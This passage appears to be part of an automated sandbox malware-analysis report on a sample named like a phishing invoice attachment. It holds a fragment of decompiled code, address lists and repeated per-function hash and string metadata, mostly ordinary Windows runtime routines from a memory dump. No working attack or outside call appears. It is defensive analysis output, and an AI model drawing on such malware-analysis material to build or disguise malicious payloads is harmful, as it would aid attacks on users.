					_t113 = L00B04620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00B2AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00B6500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00B29860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x00b651be
0x00b651c3
0x00b651c8
0x00b651cd
0x00b651d0
0x00b651d3
0x00b651d8
0x00b651db
0x00b651de
0x00b651e0
0x00b651e3
0x00b651e6
0x00b651e8
0x00b65342
0x00b65351
0x00b65356
0x00b6535a
0x00b65360
0x00b65363
0x00b65366
0x00b65369
0x00b65369
0x00b6536b
0x00b6536b
0x00b65370
0x00b653a3
0x00b653a4
0x00b653a6
0x00b653ab
0x00b653ab
0x00b653ae
0x00b653ae
0x00b653b5
0x00b653bf
0x00b653bf
0x00b65375
0x00b65396
0x00b653a0
0x00b653a0
0x00000000
0x00b65396
0x00b65377
0x00b65379
0x00b6537f
0x00b6538c
0x00b65390
0x00000000
0x00b65390
0x00b651ee
0x00b651f1
0x00b65301
0x00b65310
0x00b65315
0x00b65318
0x00b6531b
0x00b65320
0x00b6532e
0x00b65331
0x00000000
0x00b65331
0x00b65328
0x00b65329
0x00000000
0x00b65329
0x00b651fa
0x00b65235
0x00b65236
0x00b65239
0x00b6523f
0x00b65240
0x00b65241
0x00b65242
0x00b65246
0x00b65247
0x00b6524e
0x00b65251
0x00b65267
0x00b65269
0x00b6526e
0x00b6527d
0x00b6527e
0x00b65281
0x00b65282
0x00b65287
0x00b65288
0x00b6528a
0x00b6528f
0x00b65294
0x00000000
0x00000000
0x00b6529a
0x00b6529c
0x00b6529e
0x00b6529e
0x00b652a4
0x00b652b0
0x00000000
0x00000000
0x00b652ba
0x00b652bc
0x00b652bc
0x00b652d4
0x00b652d9
0x00b652dc
0x00b652e1
0x00000000
0x00000000
0x00b652e7
0x00b652f4
0x00000000
0x00b652f4
0x00b65270
0x00000000
0x00b65270
0x00b651fc
0x00b651fd
0x00b65202
0x00b65203
0x00b65205
0x00b6520a
0x00b6520f
0x00000000
0x00000000
0x00b6521b
0x00b65226
0x00b6522b
0x00b6521d
0x00b6521d
0x00b65222
0x00b65222
0x00b6522d
0x00000000

Strings

Legacy, xrefs: 00B65226
UEFI, xrefs: 00B6521D

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 00ba497e5343c8546f4f358df39187007ff8f3e0a755574dabfde02b6f830202
Instruction ID: de7112ad9fa3ccf2af9633fb1fc046b8dbc391ef6a83eef36f07f3d451ed22b4
Opcode Fuzzy Hash: 00ba497e5343c8546f4f358df39187007ff8f3e0a755574dabfde02b6f830202
Instruction Fuzzy Hash: AD517E71E00A199FDB24DFA8C890BADBBF8FF48740F2440ADE54AEB251D6759910CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00AEB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE

Download Yara Rule

APIs

_vswprintf_s.LIBCMT ref: 00B448AD

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 55ad50411a881100fc46463ecf3ae3cf48035f98ff1f5e3582763bbfd852a6d0
Instruction ID: 93e235f517c73ada64196f3b5729183678b10af6ba2230df7c7640b46c712fb0
Opcode Fuzzy Hash: 55ad50411a881100fc46463ecf3ae3cf48035f98ff1f5e3582763bbfd852a6d0
Instruction Fuzzy Hash: B551CF71D102698EDF30CF688845BAEBBF0FF00714F2042E9E859AB282D7704E55AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B0B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B0B9A5

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 6e6efe23addc4f6617af1ae144873f13f1b192e2a0d9bacb697ab1c60f27cd13
Instruction ID: 0761dc11693fdbbdc11937b5baf6c1f438fb05d801aaed29cd6381bb4d0b362d
Opcode Fuzzy Hash: 6e6efe23addc4f6617af1ae144873f13f1b192e2a0d9bacb697ab1c60f27cd13
Instruction Fuzzy Hash: 42513771A09341CFC720DF29C480A2ABBE5FB88750F2449AEF99597395DB70EC44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00AFD5E0, Relevance: 1.6, Strings: 1, Instructions: 353COMMON

Download Yara Rule

Strings

+h, xrefs: 00AFD8CE

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: +h
API String ID: 0-4061498353
Opcode ID: b63edf68107d6c96c95362e95a3b21fec237af4323d22c4e08737a7024d65eef
Instruction ID: f5bd1832cfe52e892fe357af6dfa83765dfeccc1a34eacafc3fda8a101210acc
Opcode Fuzzy Hash: b63edf68107d6c96c95362e95a3b21fec237af4323d22c4e08737a7024d65eef
Instruction Fuzzy Hash: 70E1C131A01259CFDB25DF58C990BB9B7F2BF45304F1401EAEA099B391DB349E81DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B12581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

PATH, xrefs: 00B12642, 00B12691

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: a2974fd8724378e92c4880502e674b45f4890f6ddc4f3a88828dbde979291d05
Instruction ID: 11997ccf066f9c92f66bdcc3113b2990b1e9cbd0ef6ea5c45fba5519d4c0a508
Opcode Fuzzy Hash: a2974fd8724378e92c4880502e674b45f4890f6ddc4f3a88828dbde979291d05
Instruction Fuzzy Hash: 8EC17F71D002199BCB25DF98D891BEEB7F1FF48741F9440A9E801AB390EB34AD91CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00AE2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 00B3FA4A

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: cdbfb3ba6ed75102432aab238694db9c9b7b886dfca24ce1a513ecca64b18d55
Instruction ID: 378bd3588eeeb22587efab5cb79a7b21c9543ca2e76ab34504b7f0200260cbb0
Opcode Fuzzy Hash: cdbfb3ba6ed75102432aab238694db9c9b7b886dfca24ce1a513ecca64b18d55
Instruction Fuzzy Hash: 8D613431E00685AFDB31DB69C881B7EBBF9EB44310F2406FAE815972D1DB349D008781

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

`, xrefs: 00BB0F16

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 697d31fd28d065437e64f5df807fffd6fb050008b67f2b2bc4df2cd8f3518ce6
Instruction ID: 2a262aa30d8321b53212d67e326a738251fb021cdde4495be7a8e374640adadc
Opcode Fuzzy Hash: 697d31fd28d065437e64f5df807fffd6fb050008b67f2b2bc4df2cd8f3518ce6
Instruction Fuzzy Hash: 5851AC702083429FD725EF28D891B7BB7E5EBC4304F4409ADF98697291DBB0E845CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B1F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 00B1F124

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: e5da0b7f4e9c89b3a659ed0728bcb67ccf045f3229c504cb189b6c02cfd8506f
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: DD51AD71504711AFC321CF28C841A6BBBF8FF48710F00896DF99997291E7B4E954CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B63540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 00B6358F

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: f4aa68039ab19fd58b698fbb54e4054d35a8562ac3ab106276b8e4de51694436
Instruction ID: d25bc6d0057cffed6be51281cbc1a679920b3dc16faaea5cd8482b665cbbe9d4
Opcode Fuzzy Hash: f4aa68039ab19fd58b698fbb54e4054d35a8562ac3ab106276b8e4de51694436
Instruction Fuzzy Hash: 004144B2D0452DAADF219A50DC81FAEB7FCAB45B14F0045E5FA09A7241DB349F888F94

Uniqueness

Uniqueness Score: -1.00%

Function 00BB05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

`, xrefs: 00BB0633

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 32257f09e850aaec354852c3a44bab66c50c432b7d19d8f8e449cfc46000fcc2
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: A731F3326143056BE710EE25CC85FAB77D9EBC4754F044269F9599B280DBB0ED14C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B63884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 00B638B4

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: b7c753f290d711c6785b676bc1e32ddc45e1787ab8de488f7caa9943454c228a
Instruction ID: 47c91358cc851b4b546a8a16d2c747a810b8aeb73296175d780c347e014fa898
Opcode Fuzzy Hash: b7c753f290d711c6785b676bc1e32ddc45e1787ab8de488f7caa9943454c228a
Instruction Fuzzy Hash: 21310332D00519AFEB15DA58C945E6BB7F4EB80B20F1181A9E90AA7281D7749F00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B1D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 00B1D303

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 3f102b3c34270ae8a1c9c237106b92cab5cd3d09e1effc85295205a44f0748be
Instruction ID: 2c63a279c9ae2cbdf9c4c09f6c6ee0ea7a5d4d1ae284f1415f6e67e31b5c1854
Opcode Fuzzy Hash: 3f102b3c34270ae8a1c9c237106b92cab5cd3d09e1effc85295205a44f0748be
Instruction Fuzzy Hash: 6131E2B15083009FC311DF28E8819ABFBE8EB85754F500AAEF9A483250D734DD44CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00AF1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 00AF1BC5

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: dd33a94e6bf0f5dd044931c0ab36f51cac92792992a12537f7960e491e3b6610
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 7D21B07698122CEBCB219B998840F7BB7B9EB41B50F1544A5BA04DB200DA35DD02E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B0F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 00B0F73F

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 60e7e8589101760396861d6da2c8f0b9fed69755ee9668db30b71d3c59e8e092
Instruction ID: f824b0600005d4a04e887f7e471694eb6083ddf6931190fa0465d5d5d6feb2ad
Opcode Fuzzy Hash: 60e7e8589101760396861d6da2c8f0b9fed69755ee9668db30b71d3c59e8e092
Instruction Fuzzy Hash: 7A118B357046038FEB388E1D88907367AD6EB96764F3545BAE862CBBD1DBB0CC418342

Uniqueness

Uniqueness Score: -1.00%

Function 00B98DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Critical error detected %lx, xrefs: 00B98E21

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 1bce6986503757cc78534b5ab648dc250e66cb29c08a34709166a1e8e51283dd
Instruction ID: 9631cf048ddc2e89df8ff9dfd57fa80a09f31c62488b7608b76d3147ec23b4b7
Opcode Fuzzy Hash: 1bce6986503757cc78534b5ab648dc250e66cb29c08a34709166a1e8e51283dd
Instruction Fuzzy Hash: 4B113975D14748DADF24DFB8951679CBBF0BB05315F2042AEE469AB292C7740A01CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00B7FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00B7FF60

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 62ac01e2f5d5a379b1eb6cd64052c15352d955d26791ff7d2c20453a670ac0f8
Instruction ID: 20e79c32be8e722b628d2b41b782f109dca46f00e65f7a7b795f6317180bc066
Opcode Fuzzy Hash: 62ac01e2f5d5a379b1eb6cd64052c15352d955d26791ff7d2c20453a670ac0f8
Instruction Fuzzy Hash: 9711E171911544EFDB22EB50CC49FA8B7F2FB04714F2480A4F0096B2A2CB789940CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee5f17cdde0fc6c035dcd103a683343dc799151e284c11893ae3e9b84684d0c
Instruction ID: 29d52236237e3a663b84691499065a3eb20bcb2cd2570bf1f6688394267fdc37
Opcode Fuzzy Hash: 4ee5f17cdde0fc6c035dcd103a683343dc799151e284c11893ae3e9b84684d0c
Instruction Fuzzy Hash: D84247759006298FDB24CF68C881BA9B7F1FF49304F1481EAD94DAB242E7B49E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B04120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 365258e1d6a4044666433b915ff28c5a0b05970be498473331ca79a0ea81fc18
Instruction ID: cc7fd868fdb2ffa7c419d796ef466d78f30df31993d8b8bf8fd603cb3cd44754
Opcode Fuzzy Hash: 365258e1d6a4044666433b915ff28c5a0b05970be498473331ca79a0ea81fc18
Instruction Fuzzy Hash: 7DF17EB06082118BC724CF19C480A3ABBE1FF98754F1589AEF996CB390E734DD81DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B120A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55d9e149257aef8c619e21f0da02c6c6831745f830283fa926992752102748b8
Instruction ID: 2c8ce5cc4d07c3695a8c3705ee7d6174af355993c88c4fd1f25668771cd9bb18
Opcode Fuzzy Hash: 55d9e149257aef8c619e21f0da02c6c6831745f830283fa926992752102748b8
Instruction Fuzzy Hash: 92F11231A087419FD725CF28C8907AAB7E1EF85325F5485EDE8999B390D734DC94CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00AF849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42e9829ab90a0d993960e8b6f63dd854f59f84c0e22467e09ea10a65d9a1a457
Instruction ID: d02245d7c03417de529697fa43ed82890682213ffce6205a21fed0cf08749e35
Opcode Fuzzy Hash: 42e9829ab90a0d993960e8b6f63dd854f59f84c0e22467e09ea10a65d9a1a457
Instruction Fuzzy Hash: ABB14870E04219DFCB14DFE8D994AAEBBF5FF48304F20416AE505AB256EB74AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B1513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 533f72444de6fdcefed52e31aff53581f035c5af6f5f1a723982f1bce4a88065
Instruction ID: 900f6cc717b2bcc2a35e9288d4635f3f589f5950ad4dd466fae5c0eef7a3b642
Opcode Fuzzy Hash: 533f72444de6fdcefed52e31aff53581f035c5af6f5f1a723982f1bce4a88065
Instruction Fuzzy Hash: 67C100755093808FD365CF28C580A5AFBE1FF88304F544AAEF8998B352D771E985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B103E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faf166b40c81448c2dab6c5094fcc9a207bf974120a39838a5c20c88ed957168
Instruction ID: 6cc19717471ea6e1cf289b672573ca20297e3729557a23df7f4133088e432613
Opcode Fuzzy Hash: faf166b40c81448c2dab6c5094fcc9a207bf974120a39838a5c20c88ed957168
Instruction Fuzzy Hash: FE911831E002149BDB21AB68C895BEDB7F4EB05718F1502E5FD10AB2D1EBB49DC4C791

Uniqueness

Uniqueness Score: -1.00%

Function 00AEC600, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6870a38f8b2cb358e12d4ffbfb32d602ffeed65f84381ee699c843bb0118647
Instruction ID: 81bc8d1f7c58bb45bbf3229109bfdbe580384e9d9b6f2e2dd821caf8b4a96d55
Opcode Fuzzy Hash: b6870a38f8b2cb358e12d4ffbfb32d602ffeed65f84381ee699c843bb0118647
Instruction Fuzzy Hash: 9981B2757882419BCB21CE14E891B3FB3E5EB88351F2448EAFD458B241DB30DD49CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B7B8D0, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1aa81f4995045e5dfca7825f34092a62c91260edb0e5a2694fd8acda0be5079
Instruction ID: 0bd9263b81fe639cb5f2a6617ec9d399f7206e8eedc8b51afacaaa43280dd1bd
Opcode Fuzzy Hash: b1aa81f4995045e5dfca7825f34092a62c91260edb0e5a2694fd8acda0be5079
Instruction Fuzzy Hash: 3871FE32240701AFDB21DF24C885F66BBE5EF44720F2485A8F66D9B2A1EB71E940DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B66DC9, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: a4f1090abcb0b1eab0942f1c7ee14e1572860d4196ac51df3c79f0dd88a99569
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: E5717A71E00619EFCB10DFA8C985AAEBBF9FF48704F1440A9E504E7291DB34EA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AE52A5, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45becfbe03ea674a6a8a8347530e1ed851fdcadad77ca032a5014dadd3740db6
Instruction ID: c3cdad3d38c7a6f197f2355faeb110e00f0ec2024a161e0e11741dd5212c1265
Opcode Fuzzy Hash: 45becfbe03ea674a6a8a8347530e1ed851fdcadad77ca032a5014dadd3740db6
Instruction Fuzzy Hash: F7510131645782ABC321EF65C841B67BBE4FF50714F10096EF59987662EB74EC04C791

Uniqueness

Uniqueness Score: -1.00%

Function 00B12AE4, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7f9197f4eba477a8d592b6d06e79669c4a7727a2861ad956d62daf473d3b52d
Instruction ID: 21846de809f3507a9d83eeecfa6d5a9db046eab28cb7c1279316d5b0f1e72781
Opcode Fuzzy Hash: e7f9197f4eba477a8d592b6d06e79669c4a7727a2861ad956d62daf473d3b52d
Instruction Fuzzy Hash: 7851A776B041158FCB14CF1CC8909FEB7F1FB8870175584AAE8469B364EB34AEA1D790

Uniqueness

Uniqueness Score: -1.00%

Function 00BAAE44, Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac0562844489d208274dcc900241fd82838b268697ffcef4a51aeb1755dd2bbd
Instruction ID: ded04a757f56e2a8a513367aeb5a3dd540902a1ba34b1393361438a5a0eeb663
Opcode Fuzzy Hash: ac0562844489d208274dcc900241fd82838b268697ffcef4a51aeb1755dd2bbd
Instruction Fuzzy Hash: BC4117B17082516FC72A9A29C894B3BB7D9EF86720F14429AFC16C7290DB35DC01C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 00B0DBE9, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0153dcdedda3952bfa7ae23592dd8e72bd829829b2c8403aeffe020526f30c9a
Instruction ID: 815faeb0ee0069e192a56850e7452d2430a2f462648654e2aa59c7481b93a2d5
Opcode Fuzzy Hash: 0153dcdedda3952bfa7ae23592dd8e72bd829829b2c8403aeffe020526f30c9a
